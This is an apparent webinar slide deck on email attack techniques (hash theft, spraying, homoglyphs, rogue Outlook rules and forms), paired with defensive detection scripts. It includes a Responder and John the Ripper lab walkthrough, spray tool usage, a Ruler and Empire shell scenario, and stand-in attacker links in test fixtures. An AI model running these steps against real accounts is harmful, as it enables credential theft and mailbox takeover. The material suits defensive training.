
Incredible Email Hacks You'd Never Expect

Roger Grimes, Data-Driven Defense Evangelist, KnowBe4


Brandon Dunlap, Moderator

Roger A. Grimes
Data-Driven Defense Evangelist,
KnowBe4, Inc.
[email protected]
About Roger
• 30 years plus in computer security, 20 years pen testing
• Expertise in host and network security, IdM, crypto, PKI, APT, honeypot, cloud security
• Consultant to world’s largest companies and militaries for decades
• Previously worked for Foundstone, McAfee, Microsoft
• Written 13 books and over 1,100 magazine articles
• InfoWorld and CSO weekly security columnist 2005 - 2019
• Frequently interviewed by magazines (e.g. Newsweek) and radio shows (e.g. NPR’s All Things Considered)
Roger A. Grimes
Data-Driven Defense Evangelist
KnowBe4, Inc.
e: [email protected]
Twitter: @RogerAGrimes
LinkedIn: https://www.linkedin.com/in/rogeragrimes/
Certification exams passed include:
• CPA
• CISSP
• CISM, CISA
• MCSE: Security, MCP, MVP
• CEH, TISCA, Security+, CHFI
• yada, yada
Roger’s Books

Today’s Presentation
• Incredible ways you and your organization can be
compromised involving email
• Regular social engineering and phishing is your biggest
problem
• But can’t hurt to be aware of what is possible
Covered Topics
• Password Hash Theft
• Clickjacking
• Password Spray Attacks
• Rogue Recoveries
• Homoglyphs
• Bad Rules and Rogue Forms
Password Hash Theft
Password Hash Basics
• In most authentication systems, passwords
are stored and transmitted as cryptographic
hashes (LM, NT, MD5, Bcrypt, SHA1, SHA2,
etc.)
• Password hashes can be cracked using
brute force, hash tables, rainbow tables, etc.
• Opening an email or clicking on a link can
transmit your password hash
URL Password Hash Theft
Password Hash Capture Steps
1. Hacker creates/has a malicious web server on Internet
2. Creates a malicious URL address that links to object on web server
3. Sends link to victim (e.g., using email, etc.)
4. Victim clicks on URL link
5. Email program/browser attempts to retrieve object
6. Server says it requires an authenticated logon to access object
7. Email program/browser attempts authenticated logon
8. Sends remote logon attempt from which attacker can derive password hash

URL Password Hash Theft Demo
URL Click sends Your Password Hash
Kevin Mitnick demo
• Uses file://// trick
• https://blog.knowbe4.com/kevin-mitnick-demos-password-hack-no-link-click-or-attachments-necessary
• I Can Get and Hack Your Password Hashes From Email
• https://www.csoonline.com/article/3333916/windows-security/i-can-get-and-crack-your-password-hashes-from-email.html

URL Password Hash Theft Demo
Password Hash Capture - Kevin Mitnick Demo

URL Password Hash Theft Demo
Kevin Mitnick Demo - Steps
1. Sets up Responder tool (https://github.com/SpiderLabs/Responder)
2. Creates and sends malicious email, includes UNC link (file:////) pointing to object on Responder server
3. Victim opens email in O365
4. Email program/browser attempts to retrieve object
5. Responder captures NT challenge response
6. Attacker generates and cracks NT hash to obtain plaintext password

Creating Your Own Responder Demo
Creating Your Own Demo Environment Quickly in 1 Hour
Make a Windows VM and a Linux VM on the same simulated network
1. Download and run Kali Linux (https://www.kali.org/news/kali-linux-2018-4-release/)
2. Login as root, password is toor
3. Click Applications menu, choose 09 - Sniffing and Spoofing, and run Responder
4. Then run responder -I eth0 -v (note listening IP address)
On Windows computer:
1. Open browser and connect to http://<linuxIPaddress>/index.html (or any name)
2. Open File Explorer, and connect to file:////<linuxIPaddress>/index.txt
3. Responder will get NTLM challenge responses
To crack hashes, back on Linux computer:
1. Start terminal session
2. cd /usr/share/responder/logs
3. Run John the Ripper to crack the hashes in the log files
john <HTTP-NTLMv2…> or john <SMB….>

Password Hash Theft
More Attacks
Once you have the NTLM Challenge Responses and/or hashes, there are many
attacks you can do
• Example: Use NTLMRelayx
• Example: Use NTLMRelayx to dump SAM password hashes
• Example: Use NTLMRelayx to take captured NTLM challenge responses and replay
them on other computers to inject shell code
Password Hash Theft
Real Attacks
Not super common, but does happen in the real world

https://blog.lumen.com/newly-discovered-watering-hole-attack-targets-ukrainian-canadian-organizations/
Password Hash Theft
Real Attacks

https://blogs.manageengine.com/it-security/2020/04/22/breaking-down-the-san-francisco-airport-hack.html
URL Password Hash Theft
Defenses
• Require passwords with enough entropy to withstand cracking attempts
• Block unauthorized outbound authentication logons at perimeter and/or host
• Port blocking: NetBIOS: UDP 137 & 138, TCP 139 & 445; LLMNR: UDP & TCP 5535; LDAP: UDP/TCP 389 & 636; SQL: TCP 1433; TCP 21; SMTP: TCP 25 & 587; POP: TCP 110 & 995; IMAP: TCP 143 & 993
• Can you block on portable devices wherever they connect?
• Filter out inbound file://// links
• Optional Microsoft patch and registry configuration settings: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170014
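As an added example (not code from the deck or from KnowBe4), here is one way to implement the "filter out inbound file://// links" defense in Python: a gateway or triage script that parses a message and flags any href, src or background attribute in the HTML part, or any bare path in the text part, that points at a file: URL or a \\host\share UNC path, since those are the link forms that make the mail client or browser start the outbound authentication the slides describe. The sample message is constructed; 192.0.2.10 is a documentation (TEST-NET) address. When building the matching host-firewall rules from the port list above, note that LLMNR's IANA-registered port is 5355 (UDP and TCP).

```python
"""Flag inbound mail whose body carries file:// or UNC (\\host\share) links.

Added example, not from the KnowBe4 deck. The message below is constructed.
"""
import email
import re
from email import policy
from html.parser import HTMLParser

# Link forms that make a mail client or browser start an outbound SMB/WebDAV
# fetch (and with it the NTLM challenge-response) when followed.
RISKY_LINK = re.compile(r"^\s*(?:file:|\\\\)", re.IGNORECASE)


class LinkCollector(HTMLParser):
    """Collect href/src/background values from every tag in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("href", "src", "background") and value:
                self.links.append(value.strip())


def risky_links(raw_message: bytes) -> list:
    """Return every file: or UNC link found in the message's text and HTML parts."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    found = []
    for part in msg.walk():
        ctype = part.get_content_type()
        if ctype not in ("text/plain", "text/html"):
            continue
        body = part.get_content()
        if ctype == "text/html":
            collector = LinkCollector()
            collector.feed(body)
            candidates = collector.links
        else:
            # Plain text: bare file: URLs and \\host\share paths.
            candidates = re.findall(r"(?:file:/+\S+|\\\\[\w.-]+\\\S+)", body)
        found.extend(link for link in candidates if RISKY_LINK.match(link))
    return found


def should_quarantine(raw_message: bytes) -> bool:
    """Gateway decision: hold the message if it carries any such link."""
    return bool(risky_links(raw_message))


# Constructed sample: a multipart message with one harmless https link, one
# 1x1 "image" whose src is a UNC-style file: URL, and a plain-text UNC path.
SAMPLE_EMAIL = b"""\
From: sender@example.invalid
To: victim@example.invalid
Subject: Invoice attached
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

See the invoice at \\\\192.0.2.10\\share\\invoice.pdf
--b1
Content-Type: text/html; charset="utf-8"

<html><body>
<a href="https://example.invalid/invoice">Invoice</a>
<img src="file:////192.0.2.10/share/tracker.png" width="1" height="1">
</body></html>
--b1--
"""

if __name__ == "__main__":
    for link in risky_links(SAMPLE_EMAIL):
        print("quarantine candidate:", link)
```

The same check can run on the outbound side of a web proxy, but the point of doing it at the mail gateway is that the user never gets the chance to click.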
Clickjacking
Traditional Method
Spammer/Attacker/Phisher:
• Tricks you into clicking on something you didn’t intend to click on
• To send you to ad or rogue web site
• Uses JavaScript to switch out elements when you go to click on something
Clickjacking
New - Rogue Wiping Elements
Spammer/Attacker/Phisher:
• Creates a “bothersome” element that, when wiped, launches a connection back to a rogue website
• Sends your password hash, etc.
• Uses a brown/black dot to appear like dust on the screen
• Uses a brown/black curved object to look like a hair on the screen
• User tries to wipe away the dust or hair, activating the link
• Which may send your password hash
Clickjacking
Defenses
• Be aware that touch screens may introduce some new types of attacks
• Realize that dust or hair may not be dust or hair
• Education
Password Sprays
Intro
Using a hacking tool against an online portal to guess at multiple accounts
using one or more passwords
• AKA “credential stuffing”
• Attacks are usually “wide, low and slow” to avoid kicking off account
lockouts and alerts
• Hacker needs logon names (email addresses often work) and online portal
to guess against (email portals are great for this) or open API
• Can never lockout true Windows Administrator account (RID 500)
Password Sprays
Step 1 – Collect Victim Company Logon Information
Use a tool to do Internet searches for victim company info
• At minimum: email addresses and logon portals
• Example: Fingerprinting Organizations with Collected Archives (FOCA)
• Uses 3 search engines: Google, Bing, and DuckDuckGo to search for company content
• Search Types: web, document, DNS, IP, fingerprinting, data leaks, backup files, open directories, etc.
Getting Your Email Address & Password
Attackers Can Get It:
• There are over a hundred OSINT tools hackers can use to find information
• Example: Recon-ng
• Example: theHarvester
• Example: Awesome OSINT
• https://github.com/jivoi/awesome-osint
Password Sprays
Step 2a – Find Unprotected Online Portal to Guess Against
Or manual searches
• Example: Inurl:”/adfs/ls/” intitle:”Sign In”
Password Sprays
Step 2b – Find Unprotected Open API to Guess Against
Application Programming Interfaces (APIs) connection points are often
accessible over the Internet
• Many require/allow logon authentication
• Can be used for password spray attacks
• May bypass MFA requirements
• Akamai said 75% of password spray attacks were against APIs
• https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/soti-security-financial-services-hostile-takeover-attempts-report-2020.pdf
Password Sprays
Step 3 – Get and Use Password Lists
People often use the same passwords
• 75% of organizations have people with passwords on a list of 1,000
passwords
• 87% of organizations have people with passwords on a list of 10,000
passwords
Password Sprays
Step 4 – Use Tool to Guess At Passwords
Tool – Spray
Usage: spray.sh -<typeoflogon> <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
Password Sprays
Step 5 – Harvest Passwords
Password Sprays
Defenses
• Require passwords with strong entropy
• Require Multi-Factor Authentication (MFA)
• Protect Online Portals With VPNs
• Rename the Windows Administrator account
• Minimize how easy it is for attacker to find/confirm logon names
• Enable account lockout
• Enable monitoring to detect password spray attacks
• Do this for APIs, too!
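Added example, not from the deck: detection logic for the "enable monitoring to detect password spray attacks" bullet. A spray is wide (many accounts), low (one or two guesses per account) and slow (spread over time), so per-account lockout counters never fire. The check below groups failed logons by source address inside a sliding time window and flags a source that fails against many distinct accounts while staying under the per-account threshold, then lists the accounts that later succeeded from that source, which are the ones to reset first. The log format, thresholds, usernames and addresses are constructed.

```python
"""Detect password-spray patterns in authentication logs.

Added example, not from the KnowBe4 deck. Log lines and thresholds are
constructed for the demo; adapt parse() to your portal or API log format.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: "timestamp user source result".
# 203.0.113.5 tries one password against seven accounts a couple of minutes
# apart (a spray); 198.51.100.7 is one user mistyping her own password.
SAMPLE_LOG = """\
2024-03-01T09:00:01 alice 203.0.113.5 FAIL
2024-03-01T09:02:11 bob 203.0.113.5 FAIL
2024-03-01T09:04:37 carol 203.0.113.5 FAIL
2024-03-01T09:06:52 dave 203.0.113.5 FAIL
2024-03-01T09:09:03 erin 203.0.113.5 FAIL
2024-03-01T09:11:40 frank 203.0.113.5 FAIL
2024-03-01T09:13:58 grace 203.0.113.5 SUCCESS
2024-03-01T09:05:00 alice 198.51.100.7 FAIL
2024-03-01T09:05:30 alice 198.51.100.7 FAIL
2024-03-01T09:06:00 alice 198.51.100.7 SUCCESS
"""


def parse(log_text):
    """Turn log lines into (timestamp, user, source, result) tuples sorted by time."""
    events = []
    for line in log_text.splitlines():
        ts, user, src, result = line.split()
        events.append((datetime.fromisoformat(ts), user, src, result))
    return sorted(events)


def find_sprays(log_text, window=timedelta(minutes=30), min_users=5, max_per_user=3):
    """Return {source: sorted usernames} for sources whose failures look like a spray.

    A source is flagged when, inside some sliding window, it fails against at
    least `min_users` distinct accounts while never exceeding `max_per_user`
    failures for any one of them (the "wide, low and slow" shape). A single
    account hammered with many guesses is brute force, not a spray, and is
    left to the normal lockout policy.
    """
    by_src = defaultdict(list)
    for ts, user, src, result in parse(log_text):
        if result == "FAIL":
            by_src[src].append((ts, user))
    flagged = {}
    for src, fails in by_src.items():
        start = 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1
            per_user = defaultdict(int)
            for _, user in fails[start:end + 1]:
                per_user[user] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                users = sorted(per_user)
                # Keep the widest set of targeted accounts seen for this source.
                if src not in flagged or len(users) > len(flagged[src]):
                    flagged[src] = users
    return flagged


def successes_after_spray(log_text, sprays):
    """(source, user) pairs that logged in successfully from a flagged source."""
    return [(src, user) for _, user, src, result in parse(log_text)
            if result == "SUCCESS" and src in sprays]


if __name__ == "__main__":
    sprays = find_sprays(SAMPLE_LOG)
    for src, users in sprays.items():
        print(f"spray from {src}: {len(users)} accounts targeted: {', '.join(users)}")
    for src, user in successes_after_spray(SAMPLE_LOG, sprays):
        print(f"reset and investigate: {user} succeeded from {src}")
```

Real sprays rotate source addresses, so in production the grouping key is usually a user-agent plus ASN or a tenant-wide count of distinct accounts failing per hour, rather than a single IP; the sliding-window logic stays the same.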
Rogue Recoveries
Hacking Into Your Email Using Recovery Methods
• Nearly every major email provider includes a “recovery” method that can be
used as an alternate login when your primary method doesn’t work
• Password reset questions
• SMS PIN codes
• Alternate email addresses
• Most recovery methods are not nearly as secure as the primary method
• Hackers often intentionally send email accounts into recovery mode, and
then use the recovery method to compromise it
Rogue Recoveries
Hacking Into Your Email Using Recovery Methods
• Password Reset Questions
Rogue Recoveries
Hacking Into Your Email Using Recovery Methods
Problem: Answers can often be easily guessed by hackers
Great Google paper called Secrets, Lies, and Account Recovery: Lessons from the Use of Personal
Knowledge Questions at Google
http://www.a51.nl/sites/default/files/pdf/43783.pdf
• 20% of some recovery questions can be guessed on first try by hacker
• 40% of people were unable to successfully recall their own recovery answers
• 16% of answers could be found in person’s social media profile
• Attack has been involved in many well known attacks (e.g. Sarah Palin’s compromised email)
Rogue Recoveries
Defense
Solution: Never answer the questions with the real answers!
Unfortunately, that means you have to record them somewhere else, just like passwords (password managers help with this)
Rogue Recoveries
Hacking Into Your Email Using Recovery Methods
SMS Recovery Hack
• Hacker Must Know Your Email Address
• Hacker Must Know Your Phone Number
• Can do a SIM (subscriber identity module) information swap
• See my 12 Ways to Hack MFA presentation
Rogue Recoveries
Hacking Into Your Email Using Recovery Methods
SMS Recovery Hack - Steps
1. Hacker sends you a text pretending to be from your email provider asking for your forthcoming SMS PIN reset code
2. Hacker forces your email account into SMS PIN recovery mode
3. You get text from vendor with your reset code, which you then send to other number
4. Hacker uses your SMS PIN code to login to your email account and take it over

Note: To be fair, Google has some of the best recovery options of any email provider, including that it can send a non-SMS message to your phone before the hacker can even get to the SMS code screen to get Google to send an SMS message
Rogue Recoveries
Defenses
• Be aware of rogue recovery messages
• Recognize when SMS recovery PINs should be typed into browsers, not
(usually) back into SMS
• Use MFA when possible
• Try to avoid alternate email-based recovery methods
• Try to avoid SMS-based recovery methods
• Try to minimize public posting of phone numbers related to your recovery
account methods
Homoglyph Attacks
Quickly
• What looks like a regular-looking letter or character can be a look-a-like
character of another language
• Hackers create fake domains that use look-alike characters – homoglyphs
• Attacks using homoglyphs are known as homographic attacks
• Also known as punycode attacks
Homoglyph Attacks
Character Sets
• All devices/OS/apps use a “character set” to define
what characters and languages can be used to display
and print characters
• The first computers used the ASCII character set
• Only supported 128 English characters (control
characters plus characters on your keyboard)
• 128-characters is a bit limiting even for English
speakers
Homoglyph Attacks
Character Sets – ANSI & Unicode
• Early on, Microsoft Windows used what is known as the
American National Standards Institute (ANSI) character-set
• 218 characters
• Wasn’t built to handle more complex languages like Cyrillic
and Chinese.
• Starting with Microsoft Windows 2000, Microsoft started to
use Unicode
• Unicode supports every known language, active and
ancient, and it can represent millions of different chars
Homoglyph Attacks
Character Sets – UTF-8 & Punycode
• Since 2009, the World Wide Web uses a character-set known
as UTF-8 (Unicode Transformation Format 8-bit)
• It’s a subset of over 1 million Unicode characters.
• Subset of UTF-8 that many browsers use to display hostnames is known as punycode
• When you type in a character into your browser, behind the
scenes the computer is dealing with the typed in character as
its Unicode number. It’s the way the web and web
applications work behind the scenes
Homoglyph Attacks
Homograph Attacks
• Problem: Different Unicode/punycode characters look like
each other
• For example, the Unicode Latin "a" (U+0061 hex) and
Cyrillic "а" (U+0430 hex) may look the same in a browser
URL but are different characters represented in different
languages
• This allows phishers to create new domain names that look
just like other domain names, but are different
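Added example (not the deck's code): what happens to a homoglyph domain on its way to DNS, and one check a mail filter or link-rewriting proxy can apply before a user sees the link. to_punycode converts each non-ASCII label to the xn-- form using Python's RFC 3492 punycode codec; it skips the IDNA nameprep/UTS-46 normalisation that real browsers also apply, so it is a demonstration of the encoding, not a full IDNA implementation. assess flags labels that mix scripts, and separately points out labels made entirely of a non-Latin script, since a whole-script look-alike of a Latin brand passes a mixed-script check. The Cyrillic "apple" label is the one from the xudongz.com post cited on the next slide; "pаypal" with one Cyrillic "a" is constructed.

```python
"""Punycode conversion and mixed-script detection for homoglyph domains.

Added example, not from the KnowBe4 deck. Sample domains are constructed
(the Cyrillic "apple" one is the well-known xudongz.com demonstration).
"""
import unicodedata


def script_of(ch: str) -> str:
    """Coarse script name taken from the character's Unicode name (LATIN, CYRILLIC, ...)."""
    name = unicodedata.name(ch, "")
    return name.split(" ", 1)[0] if name else "UNKNOWN"


def label_scripts(label: str) -> set:
    """Scripts used by the letters of one domain label; digits and hyphens ignored."""
    return {script_of(c) for c in label if c.isalpha()}


def to_punycode(domain: str) -> str:
    """Convert each non-ASCII label to its xn-- form, as a browser does before resolving."""
    out = []
    for label in domain.lower().split("."):
        if label.isascii():
            out.append(label)
        else:
            out.append("xn--" + label.encode("punycode").decode("ascii"))
    return ".".join(out)


def from_punycode(domain: str) -> str:
    """Inverse of to_punycode: show the Unicode the user would have seen."""
    out = []
    for label in domain.split("."):
        if label.startswith("xn--"):
            out.append(label[4:].encode("ascii").decode("punycode"))
        else:
            out.append(label)
    return ".".join(out)


def assess(domain: str) -> dict:
    """Report the punycode form and the reasons, if any, a label is suspicious."""
    reasons = []
    for label in domain.split("."):
        scripts = label_scripts(label)
        if len(scripts) > 1:
            reasons.append(f"{label!r} mixes scripts {sorted(scripts)}")
        elif scripts and "LATIN" not in scripts and not label.isascii():
            # Whole-script confusable: every letter is non-Latin, so a look-alike
            # of a Latin brand would pass a mixed-script check. Surface it so the
            # punycode form, not the look-alike, is what the reviewer compares.
            reasons.append(f"{label!r} is entirely {scripts.pop()}; compare its punycode form "
                           f"with the domain you expect")
    return {"input": domain, "punycode": to_punycode(domain),
            "suspicious": bool(reasons), "reasons": reasons}


# Constructed samples, written as escapes so the look-alike characters are explicit.
SAMPLES = [
    "apple.com",                               # plain ASCII
    "\u0430\u0440\u0440\u04cf\u0435.com",      # Cyrillic a, er, er, palochka, ie: renders like "apple"
    "p\u0430ypal.com",                         # Latin letters with one Cyrillic "a"
]

if __name__ == "__main__":
    for d in SAMPLES:
        r = assess(d)
        print(f"{r['input']:>14}  ->  {r['punycode']:<24} suspicious={r['suspicious']}")
        for reason in r["reasons"]:
            print("    ", reason)
```

Showing users the xn-- form (as the browsers that warn about homographs do) is the practical fix: punycode cannot be spoofed by a look-alike glyph, so a reviewer comparing "xn--80ak6aa92e.com" against "apple.com" sees the difference immediately.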

Homoglyph Attacks
Homograph Attacks
https://www.xudongz.com/blog/2017/idn-phishing/
(Screenshot) Not the English word apple, but a Cyrillic set of characters that look like apple
(Screenshot) When clicked on, converts to this (the punycode address)
Homoglyph Attacks
Homograph Attacks
https://thehackernews.com/2017/04/unicode-Punycode-phishing-attack.html
(Screenshot) Not the English word epic, but a Cyrillic set of characters that look like epic
(Screenshot) When clicked on, converts to this (the punycode address)
Homoglyph Attacks
Homograph Attacks
https://thehackernews.com/2017/04/unicode-Punycode-phishing-attack.html
(Screenshots) Display text said this; when I clicked on it, it said this; when I hovered over the link it said this…; when I copy/pasted it, it said this
Homoglyph Attacks
Homograph Attacks
Some browsers will warn you if they detect a homographic
attack

Homoglyph Attacks
Homoglyph Attacks
• Was a theoretical attack until it wasn’t
• https://blogs.microsoft.com/on-the-issues/2021/07/19/cybercrime-homoglyphs-dcu-court-order/
• Microsoft found 18 fake domains using homoglyph characters, used in real
world attacks

Bad Rules
Bad Mailbox Rules and Rogue Forms
• Hackers have been abusing mail rules forever, and mail forms to a lesser
extent
• Requires a previous compromise or stolen email credentials
• Attacks use rogue rules, forms, COM Add-ins, configuration settings, to
accomplish maliciousness
• Often isn’t detected by anti-malware or deterred by password changes
Bad Rules
Bad Mailbox Rules
Common example: Outlook rule which copies every incoming email to another
rogue user
Bad Rules
Bad Mailbox Rules
Called “Filters” in Gmail
Bad Rules
Bad Mailbox Rules
Other examples:
• Intercept and delete “Are you sure you want to update your bank details?”
emails
• Monitor certain key words and only send those emails to the attacker
• Format a hard drive or delete files when a “triggering email” is received
• Send account PIN reset emails to attacker
• Intercept incoming emails to switch out critical details
• Change links in outgoing email to a phishing link
Bad Rules
Bad Mailbox Rules
Common example: Outlook rule which starts rogue app or shell
• Start application and Run a script options are no longer available unless you do a registry edit and restart Outlook
• And restarting Outlook might warn the end-user…so…
Bad Forms
Rogue Forms
Another example: Create custom Outlook form which starts rogue app or shell
when specific email is received
• Modify Outlook form to do something malicious
• Can do anything programming can do
Bad Forms
Rogue Forms
Another example: Create custom Outlook form which starts rogue app or shell
• Need to add Developer tab to Outlook
• File, Options
• Quick Access Toolbar
• Design a Form
• Add>>
• OK
Bad Forms
Rogue Forms
Another example: Create custom Outlook form which starts rogue app or shell
• Create custom rogue form
Bad Forms
Rogue Forms
Another example: Create custom Outlook form which starts rogue app or shell
How to trigger?
• On the attack machine, create an Outlook form with the same name and
send an email to the victim using that form
• It will trigger the form which will trigger the rogue commands
Bad Forms
Rogue Forms
Another example: Create custom Outlook form which starts rogue app or shell
• What good is it if you have to break into the victim to break into the victim?

• Well…
Bad Forms
Rogue Forms
Another example: Create custom Outlook form which starts rogue app or shell
Use Sense Post Ruler tool
• https://github.com/sensepost/ruler
• Allows you to create custom forms remotely to a user’s email client at
Exchange, using either the MAPI/HTTP or RPC/HTTP protocols
• All hacker needs is their credentials and mail server info
Bad Forms
Rogue Forms
Great Sense Post demo video: https://www.youtube.com/watch?v=XfMpJTnmoTk
1. They have user’s email address and password
2. Use Ruler hacking tool to create rogue form in victim’s Outlook that adds
Empire remote shell
3. They send an email that activates the rogue form to get Empire shell into
victim’s machine
Bad Forms
Rogue Forms
Great Sense Post video: https://www.youtube.com/watch?v=XfMpJTnmoTk
• Uses Ruler to add Empire remote shell
Bad Rules and Rogue Forms
Defenses
• Use MFA when possible
• Check for rogue rules and custom forms
• Script for dumping all rules: https://github.com/OfficeDev/O365-InvestigationTooling/blob/master/Get-AllTenantRulesAndForms.ps1
• Notruler – checks for custom rules and forms
• https://github.com/sensepost/notruler
• Monitor email client for configuration changes
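Added example, not the deck's code and not the OfficeDev or SensePost tools it lists: a scanner over an exported list of mailbox rules that applies the rogue-rule behaviours described in this section (forwarding or redirecting to an outsider, deleting or hiding messages about bank details or PIN resets, marking them read so the victim never sees them, starting an application). The rule records and their field names (Mailbox, ForwardTo, DeleteMessage, MoveToFolder, and so on) are assumptions modelled loosely on Exchange inbox-rule properties, not the exact output of Get-AllTenantRulesAndForms.ps1 or Get-InboxRule; adapt the loader to whatever your export produces.

```python
"""Flag suspicious mailbox rules in an exported rule list.

Added example, not from the KnowBe4 deck or the tools it cites. Field names
are assumptions (loosely modelled on Exchange inbox-rule properties) and the
rule records are constructed.
"""
import json

INTERNAL_DOMAINS = {"example.invalid"}   # constructed: the org's own mail domains
SENSITIVE_WORDS = {"bank", "invoice", "password", "reset", "pin", "wire", "payment"}
# Folders attackers park intercepted mail in because users rarely look there.
HIDING_FOLDERS = {"rss feeds", "deleted items", "junk email", "archive", "conversation history"}


def is_external(address: str) -> bool:
    return address.split("@")[-1].lower() not in INTERNAL_DOMAINS


def rule_findings(rule: dict) -> list:
    """Return human-readable reasons a single rule looks rogue (empty if it looks fine)."""
    reasons = []
    for field in ("ForwardTo", "RedirectTo", "ForwardAsAttachmentTo"):
        for addr in rule.get(field, []):
            if is_external(addr):
                reasons.append(f"{field} sends mail outside the org to {addr}")
    words = {w.lower() for w in rule.get("SubjectContainsWords", []) + rule.get("BodyContainsWords", [])}
    hits = words & SENSITIVE_WORDS
    if hits and rule.get("DeleteMessage"):
        reasons.append(f"deletes messages matching sensitive words {sorted(hits)}")
    if hits and rule.get("MoveToFolder", "").lower() in HIDING_FOLDERS:
        reasons.append(f"hides messages matching {sorted(hits)} in '{rule['MoveToFolder']}'")
    if rule.get("MarkAsRead") and (rule.get("DeleteMessage") or rule.get("MoveToFolder")):
        reasons.append("marks as read before deleting/moving, so the user never notices the message")
    if rule.get("RunApplication") or rule.get("RunScript"):
        reasons.append("starts an application or script (needs the legacy registry override)")
    if rule.get("Name", "").strip() in ("", ".", ",", "..."):
        reasons.append("rule has an empty or throwaway name")
    return reasons


def scan_rules(rules_json: str) -> dict:
    """Map mailbox -> rule name -> reasons, for every rule with at least one finding."""
    report = {}
    for rule in json.loads(rules_json):
        reasons = rule_findings(rule)
        if reasons:
            report.setdefault(rule["Mailbox"], {})[rule.get("Name", "")] = reasons
    return report


# Constructed export: one benign rule and two that match the deck's examples.
SAMPLE_RULES = json.dumps([
    {"Mailbox": "alice@example.invalid", "Name": "Newsletters", "MoveToFolder": "Reading",
     "SubjectContainsWords": ["newsletter"]},
    {"Mailbox": "alice@example.invalid", "Name": ".", "ForwardTo": ["drop@attacker.invalid"],
     "MarkAsRead": True, "DeleteMessage": True, "SubjectContainsWords": ["bank", "wire"]},
    {"Mailbox": "bob@example.invalid", "Name": "Cleanup", "MoveToFolder": "RSS Feeds",
     "MarkAsRead": True, "BodyContainsWords": ["password reset", "PIN"]},
])

if __name__ == "__main__":
    for mailbox, rules in scan_rules(SAMPLE_RULES).items():
        for name, reasons in rules.items():
            print(f"{mailbox}: rule {name!r}")
            for reason in reasons:
                print("   -", reason)
```

Run it on a fresh export after every credential-theft incident and on a schedule: because rules live server-side, a password change alone does not remove them, which is why the slides say these attacks survive password resets.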
Key Takeaways
Lessons
• Email has long been a common attack vector
• Not all attacks have technical defenses or can easily be detected by traditional AV
• Train your employees to be aware that their email can be used against them and all the ways that it can be
• Phishing isn’t your only email problem
Password Exposure Test

Learn More at https://www.knowbe4.com/password-exposure-test


Questions?
Roger A. Grimes– Data-Driven Defense Evangelist, KnowBe4
[email protected]
Twitter: @rogeragrimes
www.linkedin.com/in/rogeragrimes

Tel: 855-KNOWBE4 (566-9234) | www.KnowBe4.com | [email protected]


Thank you for attending this webinar!
Please visit the
“Attachments” tab.
There you’ll find supporting
assets, speaker’s LinkedIn
information and the most
recent issue of InfoSecurity
Professional Magazine
Please take a moment to leave your feedback &
comments in the “Rate This” tab
Stay Connected!
Update your email preferences to receive
news about upcoming (ISC)² webinars,
publications & more!

Current Members:
https://www.isc2.org/Dashboard/Preferences
Non-members:
www.isc2.org/preferences
New to (ISC)²:
https://www.isc2.org/connect